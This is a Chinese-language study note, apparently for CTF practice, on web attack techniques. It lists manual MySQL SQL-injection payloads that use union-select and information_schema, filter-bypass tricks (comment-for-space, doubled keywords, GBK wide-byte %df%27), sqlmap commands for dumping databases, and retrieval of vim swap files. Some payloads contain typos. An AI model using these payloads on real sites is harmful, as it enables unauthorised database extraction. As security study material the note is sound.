信安 web 的一些心得與筆記整理(1)


sql 手工注入:

繞過空格的方法:
+ %0a %0b /**/

mysql:

在mysql中,有一個庫叫做 information_schema,里面包含了數據庫中所有庫的信息,我們可以在注入的時候用它來做很多壞事情。

注入點的確定:

用select database() 來確定數據庫名稱 1’ union select database()’
調用information_schema 來查看所有信息,我們可以用它來做很多壞事
1’ union select table_name from information_schema.tables where table_schema =’ <數據表名>

有時候,會過濾掉你的關鍵詞,這時候,把關鍵詞打兩遍或許有奇效。

確定字段名
1’ union select column_name from informaiton_schema.columnsa where table_name=’<字段名>

確定字段名中的內容
1’ union select from where ‘1’=’1
1’ union//select//flag from//flag where//’1’=’1
<備注:我感覺用#不太好,因為會被過濾掉,還是上頭那個靠譜>
‘//union//select//flag//from/**/flag#

(注入點都用1’來代替了,具體操作都不一樣。明智的人應該懂得如何手注而不是用工具)

sqlmap 搞事:

sqlmap -u”” 直接查看嘛~~ 然后加上 –dbs 倒庫
(前提是你要找到注入點啊!!!)

找到庫了之后呢 就 sqlmap -u “” -D <表名> –tables
(備注 -D 是進入,–tables 能夠查看當前庫下的東西)

然后 sqlmap -u “” -D <表名> -T <字段> <字段> –dump
(備注 –dump 能夠把數據里的東西全部到出來)
(就是一次比較簡單的sqlmap搞事了)

寬字節與gbk編碼

注入 特征:

出現 11’ and 1=2 # 時候會變成
’ 1\’ and 1=2 # 為了把\給去掉
要改為 11%df%27 and 1=2 # /%df就是一個寬字節 %27 是引號
(可能這里理解有問題。。。。。。。。。。。。)
1’ union select 1,database()
%df’ union select 1,database() %23

關於寬字節的可以看看這里

vim的備份文件:

一些愚蠢的開發者會把vim的備份文件不刪掉,
用/.《name》.swp 訪問它

burpsuite:

簡單的抓包,截包,改包操作。
對於包的熟悉能夠讓你做很多事情
以后burp的功能會在做題中慢慢提升

PHP 超好用的在線編譯軟件:

http://www.shucunwang.com/RunCode/php/

php測試在線網站

就這樣隨意寫點覺得重要的知識點吧,可能有地方有錯誤的,歡迎指正哈哈。


注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2021 ITdaan.com